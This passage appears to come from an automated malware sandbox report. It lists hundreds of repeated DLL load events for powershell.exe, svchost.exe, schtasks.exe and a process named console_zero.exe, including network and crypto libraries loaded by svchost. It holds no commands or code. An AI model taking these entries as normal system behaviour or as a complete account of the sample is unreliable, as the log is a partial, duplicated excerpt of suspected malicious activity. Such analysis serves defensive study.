          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: licensemanagersvc.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: licensemanager.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: clipc.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: dxgi.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wtsapi32.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: netapi32.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: libcurl.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: libpq.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: zlib1.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: vcruntime140.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: libssl-3-x64.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: libcrypto-3-x64.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: libintl-9.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: vcruntime140.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: vcruntime140.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: libcrypto-3-x64.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: libwinpthread-1.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: libiconv-2.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: winsta.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dll
          Source: C:\Windows\System32\console_zero.exeSection loaded: apphelp.dll
          Source: C:\Windows\System32\console_zero.exeSection loaded: libcurl.dll
          Source: C:\Windows\System32\console_zero.exeSection loaded: zlib1.dll
          Source: C:\Windows\System32\console_zero.exeSection loaded: vcruntime140.dll
          Source: C:\Windows\System32\console_zero.exeSection loaded: vcruntime140.dll
          Source: C:\Windows\System32\console_zero.exeSection loaded: kernel.appcore.dll
          Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
          Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
          Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
          Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
          Source: C:\Windows\System32\console_zero.exeSection loaded: libcurl.dll
          Source: C:\Windows\System32\console_zero.exeSection loaded: zlib1.dll
          Source: C:\Windows\System32\console_zero.exeSection loaded: vcruntime140.dll
          Source: C:\Windows\System32\console_zero.exeSection loaded: vcruntime140.dll
          Source: C:\Windows\System32\console_zero.exeSection loaded: kernel.appcore.dll
          Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
          Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
          Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
          Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
